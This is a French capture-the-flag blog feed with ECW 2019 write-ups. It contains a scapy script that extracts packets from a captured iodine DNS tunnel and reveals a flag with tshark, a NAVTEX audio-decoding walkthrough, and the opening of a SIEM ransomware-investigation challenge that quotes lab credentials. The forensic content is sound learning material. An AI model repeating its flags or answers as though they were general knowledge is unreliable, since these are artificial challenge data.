<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x07</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x7c</span><span class="p">)</span> <span class="o">>></span> <span class="mi">2</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x03</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">6</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x7e</span><span class="p">)</span> <span class="o">>></span> <span class="mi">1</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x01</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">7</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x7f</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">2</span>
<span class="k">return</span> <span class="n">buf</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="sd">"""</span>
<span class="sd">Modified version of StalkR's script from</span>
<span class="sd">http://blog.stalkr.net/2010/10/hacklu-ctf-challenge-9-bottle-writeup.html</span>
<span class="sd">This version doesn't use any Popen calls, and ignores any errors while decoding</span>
<span class="sd">- krx</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">zlib</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64encode</span><span class="p">,</span> <span class="n">b64decode</span><span class="p">,</span> <span class="n">b32encode</span><span class="p">,</span> <span class="n">b32decode</span>
<span class="kn">from</span> <span class="nn">string</span> <span class="kn">import</span> <span class="n">translate</span><span class="p">,</span> <span class="n">maketrans</span>
<span class="kn">import</span> <span class="nn">chardet</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">base128_iodine</span> <span class="kn">import</span> <span class="n">b128encode</span><span class="p">,</span> <span class="n">b128decode</span>
<span class="n">infile</span><span class="p">,</span> <span class="n">outfile</span> <span class="o">=</span> <span class="s2">"capture.pcap"</span><span class="p">,</span> <span class="s2">"inception/extracted.pcap"</span>
<span class="n">tld</span> <span class="o">=</span> <span class="s2">"to.badland.com."</span>
<span class="n">upstream_encoding</span> <span class="o">=</span> <span class="mi">128</span>
<span class="c1"># and no downstream encoding (type NULL)</span>
<span class="c1"># Translation tables for iodine's encoding</span>
<span class="n">enctrans</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">32</span><span class="p">:</span> <span class="n">maketrans</span><span class="p">(</span><span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'</span><span class="p">,</span> <span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ012345'</span><span class="p">),</span>
<span class="mi">64</span><span class="p">:</span> <span class="n">maketrans</span><span class="p">(</span><span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'</span><span class="p">,</span> <span class="s1">'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789+'</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">dectrans</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">32</span><span class="p">:</span> <span class="n">maketrans</span><span class="p">(</span><span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ012345'</span><span class="p">,</span> <span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'</span><span class="p">),</span>
<span class="mi">64</span><span class="p">:</span> <span class="n">maketrans</span><span class="p">(</span><span class="s1">'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789+'</span><span class="p">,</span> <span class="s1">'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'</span><span class="p">)</span>
<span class="p">}</span>
<span class="c1"># iodine encoders/decoders</span>
<span class="n">encoders</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">32</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">translate</span><span class="p">(</span><span class="n">b32encode</span><span class="p">(</span><span class="n">x</span><span class="p">),</span> <span class="n">enctrans</span><span class="p">[</span><span class="mi">32</span><span class="p">]),</span>
<span class="mi">64</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">translate</span><span class="p">(</span><span class="n">b64encode</span><span class="p">(</span><span class="n">x</span><span class="p">),</span> <span class="n">enctrans</span><span class="p">[</span><span class="mi">64</span><span class="p">]),</span>
<span class="mi">128</span><span class="p">:</span> <span class="n">b128encode</span>
<span class="p">}</span>
<span class="n">decoders</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">32</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">b32decode</span><span class="p">(</span><span class="n">translate</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">dectrans</span><span class="p">[</span><span class="mi">32</span><span class="p">])),</span>
<span class="mi">64</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">translate</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">dectrans</span><span class="p">[</span><span class="mi">64</span><span class="p">])),</span>
<span class="mi">128</span><span class="p">:</span> <span class="n">b128decode</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">encoder</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="n">encode</span><span class="o">=</span><span class="s2">""</span><span class="p">,</span> <span class="n">decode</span><span class="o">=</span><span class="s2">""</span><span class="p">):</span> <span class="c1"># base=[32,64,128]</span>
<span class="n">funcmap</span><span class="p">,</span> <span class="n">data</span> <span class="o">=</span> <span class="p">(</span><span class="n">encoders</span><span class="p">,</span> <span class="n">encode</span><span class="p">)</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">encode</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span> <span class="k">else</span> <span class="p">(</span><span class="n">decoders</span><span class="p">,</span> <span class="n">decode</span><span class="p">)</span>
<span class="k">return</span> <span class="n">funcmap</span><span class="p">[</span><span class="n">base</span><span class="p">](</span><span class="n">data</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">uncompress</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="k">return</span> <span class="n">zlib</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
<span class="k">except</span> <span class="n">zlib</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">b32_8to5</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
<span class="k">return</span> <span class="s2">"abcdefghijklmnopqrstuvwxyz012345"</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">lower</span><span class="p">())</span>
<span class="k">def</span> <span class="nf">up_header</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s2">"userid"</span><span class="p">:</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">16</span><span class="p">),</span>
<span class="s2">"up_seq"</span><span class="p">:</span> <span class="p">(</span><span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">>></span> <span class="mi">2</span><span class="p">)</span> <span class="o">&</span> <span class="mi">7</span><span class="p">,</span>
<span class="s2">"up_frag"</span><span class="p">:</span> <span class="p">((</span><span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">&</span> <span class="mi">3</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">2</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="o">>></span> <span class="mi">3</span><span class="p">)</span> <span class="o">&</span> <span class="mi">3</span><span class="p">),</span>
<span class="s2">"dn_seq"</span><span class="p">:</span> <span class="p">(</span><span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="o">&</span> <span class="mi">7</span><span class="p">),</span>
<span class="s2">"dn_frag"</span><span class="p">:</span> <span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span> <span class="o">>></span> <span class="mi">1</span><span class="p">,</span>
<span class="s2">"lastfrag"</span><span class="p">:</span> <span class="n">b32_8to5</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span> <span class="o">&</span> <span class="mi">1</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">dn_header</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s2">"compress"</span><span class="p">:</span> <span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">>></span> <span class="mi">7</span><span class="p">,</span>
<span class="s2">"up_seq"</span><span class="p">:</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">>></span> <span class="mi">4</span><span class="p">)</span> <span class="o">&</span> <span class="mi">7</span><span class="p">,</span>
<span class="s2">"up_frag"</span><span class="p">:</span> <span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">&</span> <span class="mi">15</span><span class="p">,</span>
<span class="s2">"dn_seq"</span><span class="p">:</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">>></span> <span class="mi">1</span><span class="p">)</span> <span class="o">&</span> <span class="mi">15</span><span class="p">,</span>
<span class="s2">"dn_frag"</span><span class="p">:</span> <span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">>></span> <span class="mi">5</span><span class="p">)</span> <span class="o">&</span> <span class="mi">7</span><span class="p">,</span>
<span class="s2">"lastfrag"</span><span class="p">:</span> <span class="nb">ord</span><span class="p">(</span><span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">&</span> <span class="mi">1</span><span class="p">,</span>
<span class="p">}</span>
<span class="c1"># Extract packets from DNS tunnel</span>
<span class="c1"># Note: handles fragmentation, but not packet reordering (sequence numbers)</span>
<span class="n">dn_pkt</span><span class="p">,</span> <span class="n">up_pkt</span> <span class="o">=</span> <span class="s1">''</span><span class="p">,</span> <span class="s1">''</span>
<span class="n">datasent</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">E</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="c1"># modified from rdpcap to PcapReader</span>
<span class="k">with</span> <span class="n">PcapReader</span><span class="p">(</span><span class="n">infile</span><span class="p">)</span> <span class="k">as</span> <span class="n">pcap_reader</span><span class="p">:</span>
<span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">pcap_reader</span><span class="p">:</span>
<span class="n">i</span><span class="o">+=</span><span class="mi">1</span>
<span class="k">if</span> <span class="n">i</span> <span class="o">%</span> <span class="mi">1000</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="c1"># Just for progress</span>
<span class="nb">print</span> <span class="n">i</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">pkt</span><span class="o">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNS</span><span class="p">):</span>
<span class="k">continue</span>
<span class="k">if</span> <span class="n">DNSQR</span> <span class="ow">in</span> <span class="n">pkt</span><span class="p">:</span>
<span class="k">if</span> <span class="n">DNSRR</span> <span class="ow">in</span> <span class="n">pkt</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">DNSRR</span><span class="p">]</span><span class="o">.</span><span class="n">rdata</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span> <span class="c1"># downstream/server</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">DNSRR</span><span class="p">]</span><span class="o">.</span><span class="n">rdata</span>
<span class="k">if</span> <span class="n">datasent</span><span class="p">:</span> <span class="c1"># real data and no longer codec/fragment checks</span>
<span class="n">dn_pkt</span> <span class="o">+=</span> <span class="n">d</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
<span class="k">if</span> <span class="n">dn_header</span><span class="p">(</span><span class="n">d</span><span class="p">)[</span><span class="s1">'lastfrag'</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">dn_pkt</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span>
<span class="n">u</span> <span class="o">=</span> <span class="n">uncompress</span><span class="p">(</span><span class="n">dn_pkt</span><span class="p">)</span>
<span class="k">if</span> <span class="n">u</span><span class="p">:</span>
<span class="c1"># Include the packet if decoding succeeded,</span>
<span class="c1"># ignore it and move on otherwise</span>
<span class="n">E</span> <span class="o">+=</span> <span class="p">[</span><span class="n">IP</span><span class="p">(</span><span class="n">u</span><span class="p">[</span><span class="mi">4</span><span class="p">:])]</span>
<span class="n">dn_pkt</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># upstream/client</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">DNSQR</span><span class="p">]</span><span class="o">.</span><span class="n">qname</span>
<span class="nb">print</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">d</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="k">if</span> <span class="n">d</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="s2">"0123456789abcdef"</span><span class="p">:</span>
<span class="n">datasent</span> <span class="o">=</span> <span class="kc">True</span>
<span class="n">up_pkt</span> <span class="o">+=</span> <span class="n">d</span><span class="p">[</span><span class="mi">5</span><span class="p">:</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">tld</span><span class="p">)]</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"."</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="k">if</span> <span class="n">up_header</span><span class="p">(</span><span class="n">d</span><span class="p">)[</span><span class="s1">'lastfrag'</span><span class="p">]</span> <span class="ow">and</span> <span class="nb">len</span><span class="p">(</span><span class="n">up_pkt</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span><span class="p">:</span>
<span class="n">u</span> <span class="o">=</span> <span class="n">uncompress</span><span class="p">(</span><span class="n">encoder</span><span class="p">(</span><span class="n">upstream_encoding</span><span class="p">,</span> <span class="n">decode</span><span class="o">=</span><span class="n">up_pkt</span><span class="p">))</span>
<span class="k">if</span> <span class="n">u</span><span class="p">:</span>
<span class="c1"># Include the packet if decoding succeeded,</span>
<span class="c1"># ignore it and move on otherwise</span>
<span class="n">E</span> <span class="o">+=</span> <span class="p">[</span><span class="n">IP</span><span class="p">(</span><span class="n">u</span><span class="p">[</span><span class="mi">4</span><span class="p">:])]</span>
<span class="n">up_pkt</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">wrpcap</span><span class="p">(</span><span class="n">outfile</span><span class="p">,</span> <span class="n">E</span><span class="p">)</span>
<span class="nb">print</span> <span class="s2">"Successfully extracted </span><span class="si">%i</span><span class="s2"> packets into </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">E</span><span class="p">),</span> <span class="n">outfile</span><span class="p">)</span>
</code></pre></div>
<p>On obtions le résultat suivant :</p>
<div class="highlight"><pre><span></span><code>$ python2 python2.py
Successfully extracted <span class="m">11</span> packets into inception/extracted.pcap
</code></pre></div>
<p>On lui ensuite le fichier avec <code>tshark</code> :</p>
<div class="highlight"><pre><span></span><code>$ tshark -q -r inception/extracted.pcap -z follow,tcp,ascii,0
<span class="o">===================================================================</span>
Follow: tcp,ascii
Filter: tcp.stream eq <span class="m">0</span>
Node <span class="m">0</span>: <span class="m">10</span>.0.0.2:50568
Node <span class="m">1</span>: <span class="m">10</span>.0.0.1:1664
<span class="m">1078</span>
flag.txt............................................................................................000644 .000000 .000000 .00000000046 <span class="m">13542743565</span> <span class="m">012524</span>. <span class="m">0</span>....................................................................................................ustar.00root............................root............................000000 .000000 ........................................................................................................................................................................ECW<span class="o">{</span>E58B25A5943223922CA75B6AE6F06413<span class="o">}</span>
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<span class="m">970</span>
..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<span class="o">===================================================================</span>
</code></pre></div>
<p>YEAH ! On a le flag. Il faut cependant le remettre en forme.</p>
<div class="highlight"><pre><span></span><code>$ tshark -q -r inception/extracted.pcap -z follow,tcp,ascii,0 <span class="p">|</span> tr <span class="s1">'[:upper:]'</span> <span class="s1">'[:lower:]'</span> <span class="p">|</span> sed <span class="s1">'s/\.//g'</span> <span class="p">|</span> sed <span class="s1">'s/ecw/ECW/g'</span>
<span class="o">===================================================================</span>
follow: tcp,ascii
filter: tcpstream eq <span class="m">0</span>
node <span class="m">0</span>: <span class="m">10002</span>:50568
node <span class="m">1</span>: <span class="m">10001</span>:1664
<span class="m">1078</span>
flagtxt000644 <span class="m">000000</span> <span class="m">000000</span> <span class="m">00000000046</span> <span class="m">13542743565</span> <span class="m">012524</span> 0ustar00rootroot000000 <span class="m">000000</span> ECW<span class="o">{</span>e58b25a5943223922ca75b6ae6f06413<span class="o">}</span>
<span class="nv">970</span>
<span class="o">===================================================================</span>
</code></pre></div>
<p>Voilà ! 50 points de faits :).</p>ECW - Radio intercept2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-radio-intercept.html<div class="highlight"><pre><span></span><code><span class="n">Radio</span> <span class="n">intercept</span> <span class="p">(</span><span class="mi">50</span> <span class="n">points</span><span class="p">)</span>
<span class="n">Our</span> <span class="n">technical</span> <span class="n">teams</span> <span class="n">have</span> <span class="n">intercepted</span> <span class="n">a</span> <span class="n">mysterious</span> <span class="n">radio</span> <span class="n">message</span> <span class="n">coming</span> <span class="k">from</span> <span class="n">a</span> <span class="n">ship</span><span class="p">,</span> <span class="n">can</span> <span class="n">you</span> <span class="n">investigate</span> <span class="n">it</span><span class="o">?</span>
</code></pre></div>
<p>Voici le seul challenge de stéganographie audio de cette finale.</p>
<p>D'après l'énoncé, on sait qu'il s'agit d'un échange radio entre bateaux. Il va donc falloir chercher du côté des …</p><div class="highlight"><pre><span></span><code><span class="n">Radio</span> <span class="n">intercept</span> <span class="p">(</span><span class="mi">50</span> <span class="n">points</span><span class="p">)</span>
<span class="n">Our</span> <span class="n">technical</span> <span class="n">teams</span> <span class="n">have</span> <span class="n">intercepted</span> <span class="n">a</span> <span class="n">mysterious</span> <span class="n">radio</span> <span class="n">message</span> <span class="n">coming</span> <span class="k">from</span> <span class="n">a</span> <span class="n">ship</span><span class="p">,</span> <span class="n">can</span> <span class="n">you</span> <span class="n">investigate</span> <span class="n">it</span><span class="o">?</span>
</code></pre></div>
<p>Voici le seul challenge de stéganographie audio de cette finale.</p>
<p>D'après l'énoncé, on sait qu'il s'agit d'un échange radio entre bateaux. Il va donc falloir chercher du côté des réglementations des échanges maritimes. Un article <a href="https://fr.wikipedia.org/wiki/Radio_maritime">Wikipedia</a> présente la plus part des fréquences. Il nous faut d'abord trouver la fréquence utilisé dans l'écoute pour connaître de quel côté regarder.</p>
<p>On ouvre le fichier avec Audacity, on passe en mode vu <code>Spectrogramme</code> et on zoom :</p>
<p><img alt="navtex0.png" src="https://blog.nlegall.fr/images/ecw/navtex0.png"></p>
<p>Il semblerai que l'onde porteuse se situe au alentour de 515hz.</p>
<p>En cherchant sur internet un moyen de décoder ces messages, on trouve assez facilement cette application en Java : <a href="http://www.frisnit.com/navtex/">Frisnit Navtex Decoder</a>. Elle permet de transcrire l'échange audio. Il faut cependant connaître également la fréquence comme le logiciel mets par défaut 1000Hz.</p>
<p><img alt="navtex1.png" src="https://blog.nlegall.fr/images/ecw/navtex1.png"></p>
<p>On lance alors notre fichier audio via n'importe quel lecteur multimédia (<code>VLC</code>, <code>mpv</code>...). Le spectrogramme apparaît alors et nous permet de cliquer sur la fréquence qui nous concerne ici :</p>
<p><img alt="navtex2.png" src="https://blog.nlegall.fr/images/ecw/navtex2.png"></p>
<p>On clique et on relance alors le fichier audio :</p>
<p><img alt="navtex3.png" src="https://blog.nlegall.fr/images/ecw/navtex3.png"></p>
<p>On a bien le pique de fréquence compris entre les bornes réglables. Et le texte commence à apparaître tout seul dans la fenêtre de l'application !</p>
<p><img alt="navtex4.png" src="https://blog.nlegall.fr/images/ecw/navtex4.png"></p>
<p>Nous voilà avec le flag et 50 points de plus :D.</p>ECW - SIEM investigation2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-siem-investigation.html<div class="highlight"><pre><span></span><code><span class="n">SIEM</span> <span class="n">investigation</span> <span class="p">(</span><span class="mi">100</span> <span class="n">points</span><span class="p">)</span>
<span class="n">One</span> <span class="k">of</span> <span class="n">our</span> <span class="n">employees</span><span class="p">,</span> <span class="n">Robert</span><span class="p">,</span> <span class="k">found</span> <span class="n">a</span> <span class="n">USB</span> <span class="k">key</span> <span class="k">on</span> <span class="n">the</span> <span class="n">harbour</span> <span class="n">dock</span> <span class="n">while</span> <span class="n">walking</span> <span class="n">around</span> <span class="n">during</span> <span class="n">his</span> <span class="n">break</span> <span class="k">and</span> <span class="n">decided</span> <span class="k">to</span> <span class="k">connect</span> <span class="n">it</span> <span class="k">to</span> <span class="n">his</span> <span class="n">workstation</span><span class="p">.</span> <span class="n">Being</span> <span class="n">very</span> <span class="n">curious</span><span class="p">,</span> <span class="n">he</span> <span class="n">decided</span> <span class="k">to</span> <span class="k">open</span> <span class="n">files</span> <span class="n">contained</span> <span class="k">in</span> <span class="n">the</span> <span class="k">key</span><span class="p">.</span> <span class="n">Unfortunately</span> <span class="k">for</span> <span class="n">him</span><span class="p">,</span> <span class="n">one</span> <span class="k">of</span> <span class="n">the</span> <span class="n">files …</span></code></pre></div><div class="highlight"><pre><span></span><code><span class="n">SIEM</span> <span class="n">investigation</span> <span class="p">(</span><span class="mi">100</span> <span class="n">points</span><span class="p">)</span>
<span class="n">One</span> <span class="k">of</span> <span class="n">our</span> <span class="n">employees</span><span class="p">,</span> <span class="n">Robert</span><span class="p">,</span> <span class="k">found</span> <span class="n">a</span> <span class="n">USB</span> <span class="k">key</span> <span class="k">on</span> <span class="n">the</span> <span class="n">harbour</span> <span class="n">dock</span> <span class="n">while</span> <span class="n">walking</span> <span class="n">around</span> <span class="n">during</span> <span class="n">his</span> <span class="n">break</span> <span class="k">and</span> <span class="n">decided</span> <span class="k">to</span> <span class="k">connect</span> <span class="n">it</span> <span class="k">to</span> <span class="n">his</span> <span class="n">workstation</span><span class="p">.</span> <span class="n">Being</span> <span class="n">very</span> <span class="n">curious</span><span class="p">,</span> <span class="n">he</span> <span class="n">decided</span> <span class="k">to</span> <span class="k">open</span> <span class="n">files</span> <span class="n">contained</span> <span class="k">in</span> <span class="n">the</span> <span class="k">key</span><span class="p">.</span> <span class="n">Unfortunately</span> <span class="k">for</span> <span class="n">him</span><span class="p">,</span> <span class="n">one</span> <span class="k">of</span> <span class="n">the</span> <span class="n">files</span> <span class="n">contained</span> <span class="n">ransomware</span> <span class="k">and</span> <span class="k">all</span> <span class="n">his</span> <span class="n">documents</span> <span class="k">are</span> <span class="n">now</span> <span class="k">encrypted</span><span class="p">.</span>
<span class="n">The</span> <span class="n">events</span> <span class="k">of</span> <span class="n">his</span> <span class="n">workstation</span> <span class="k">are</span> <span class="n">available</span> <span class="k">in</span> <span class="n">the</span> <span class="n">Graylog</span> <span class="n">SIEM</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span> <span class="n">Master</span><span class="err">'</span><span class="n">s</span> <span class="n">Office</span> <span class="p">(</span><span class="n">HMO</span><span class="p">)</span> <span class="n">LAN</span> <span class="n">following</span> <span class="n">this</span> <span class="n">URL</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">hmo</span><span class="o">-</span><span class="n">graylog</span><span class="p">.</span><span class="n">harbour</span><span class="p">.</span><span class="n">lan</span><span class="p">:</span><span class="mi">8443</span> <span class="k">and</span> <span class="k">using</span> <span class="n">these</span> <span class="n">credentials</span><span class="p">:</span> <span class="n">analyst</span> <span class="o">/</span> <span class="n">ecw2019</span>
<span class="n">Investigate</span> <span class="k">to</span> <span class="n">understand</span> <span class="n">how</span> <span class="n">the</span> <span class="n">machine</span> <span class="n">was</span> <span class="n">infected</span><span class="p">,</span> <span class="n">what</span> <span class="n">traces</span> <span class="n">were</span> <span class="k">left</span> <span class="k">on</span> <span class="n">the</span> <span class="k">system</span><span class="p">,</span> <span class="k">and</span> <span class="n">which</span> <span class="n">files</span> <span class="n">were</span> <span class="n">impacted</span> <span class="k">by</span> <span class="n">the</span> <span class="n">ransomware</span><span class="p">:</span>
<span class="o">-</span> <span class="n">What</span> <span class="k">is</span> <span class="n">the</span> <span class="n">name</span> <span class="k">of</span> <span class="n">the</span> <span class="n">USB</span> <span class="n">stick</span> <span class="n">that</span> <span class="n">Robert</span> <span class="n">has</span> <span class="n">plugged</span> <span class="k">into</span> <span class="n">his</span> <span class="n">computer</span><span class="o">?</span>
<span class="o">-</span> <span class="n">What</span> <span class="k">is</span> <span class="n">the</span> <span class="n">name</span> <span class="k">of</span> <span class="n">the</span> <span class="n">file</span> <span class="n">opened</span> <span class="k">by</span> <span class="n">Robert</span> <span class="n">who</span> <span class="k">is</span> <span class="n">behind</span> <span class="n">the</span> <span class="n">ransomware</span> <span class="n">execution</span><span class="o">?</span>
<span class="o">-</span> <span class="n">How</span> <span class="n">many</span> <span class="n">files</span> <span class="n">have</span> <span class="n">been</span> <span class="k">encrypted</span><span class="o">?</span>
